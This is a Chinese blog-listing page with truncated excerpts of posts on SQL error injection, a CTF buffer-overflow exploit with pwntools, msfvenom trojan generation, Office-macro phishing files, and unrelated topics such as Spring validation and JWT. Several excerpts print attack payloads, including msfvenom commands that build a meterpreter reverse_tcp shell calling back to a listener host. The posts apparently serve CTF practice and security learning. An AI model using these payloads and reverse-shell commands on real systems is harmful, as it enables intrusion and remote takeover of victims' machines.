sql报错注入 1.报错函数 (1).floor()报错 语句: ?id=1' union select 1,count(),concat(payload,floor(rand(0)2))x from information_schema.columns group by x --+ (2).upd ...
分类:
数据库 时间:
2021-04-08 13:32:03
阅读次数:
0
放进IDA,找到gets 接收0x40位,然后查看字符串,虽然没有bin/sh,但是有能直接用的 找到所在函数和地址 exp: from pwn import * p=remote('node3.buuoj.cn',27180) sys_addr=0x40060D payload='a'*(0x40 ...
分类:
其他好文 时间:
2021-04-08 13:18:38
阅读次数:
0
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ? 放到VPS上,这里我们放到本机搭 ...
分类:
系统相关 时间:
2021-03-18 14:14:35
阅读次数:
0
一 前言 系统执行业务逻辑之前,会对输入数据进行校验,检测数据是否有效合法的。所以我们可能会写大量的if else等判断逻辑,特别是在不同方法出现相同的数据时,校验的逻辑代码会反复出现,导致代码冗余,阅读性和可维护性极差。 鉴于通用性和普遍性,Spring框架提供了validator组件,通过一些校 ...
分类:
其他好文 时间:
2021-03-15 11:18:56
阅读次数:
0
#1.关于pickle和Cpickle 等同于PHP的serialize和unserialize,是一个序列化和反序列化的过程。 #2.pickle序列化和反序列化相关的函数 4个,dump,dumps,load,loads 其中dump和load一组,dumps和loads一组 dump&load ...
分类:
其他好文 时间:
2021-03-03 12:02:47
阅读次数:
0
msf自带的有对应各个平台生成木马的工具msfvenom,而且不需要进入msf,直接在命令行输入命令即可 木马生成命令 msfvenom -p payload LHOST=本地地址 LPORT=本地端口 -f 文件类型 -o 木马文件 如: msfvenom -p windows/meterpret ...
分类:
移动开发 时间:
2021-03-02 12:09:24
阅读次数:
0
MMA CTF 2nd 2016-greeting 总结 本题主要为printf格式化字符串漏洞,最好的方式是手写fmt payload,然后有一个新的知识点: pwntools的fmtstr_payload不是特别好用,特别是只想写低字节的时候,还是得手动写fmt_payload,抽个时间自己写个 ...
分类:
其他好文 时间:
2021-03-01 14:05:56
阅读次数:
0
钓鱼文件在护网中起着重要的作用,今天我就来演示几种比较常见的钓鱼文件(大佬勿喷) 一、office宏攻击 宏是微软公司为其OFFICE软件包设计的一个特殊功能,有着独特的文件后缀名,如:xlsm,docm,pptm等。 1.msf生成payload msfvenom -p windows/meter ...
分类:
其他好文 时间:
2021-02-22 12:39:33
阅读次数:
0
JWT全称JSON Web Token,是一个紧凑的,自包含的,安全的信息交换协议。JWT有很多方面的应用,例如权限认证,信息交换等。本文将简单介绍JWT登录权限认证的一个实例操作。 JWT组成 JWT由头部(Header),负载(Payload)和签名(Signature)三部分组成。其中头部包含 ...
分类:
其他好文 时间:
2021-02-17 14:45:22
阅读次数:
0
1. 找到/node_modules/sockjs-client/dist/sockjs.js 2.找到代码的 1605行 try { // self.xhr.send(payload); } catch (e) { self.emit('finish', 0, ''); self._cleanup ...
分类:
Web程序 时间:
2021-02-06 11:46:38
阅读次数:
0
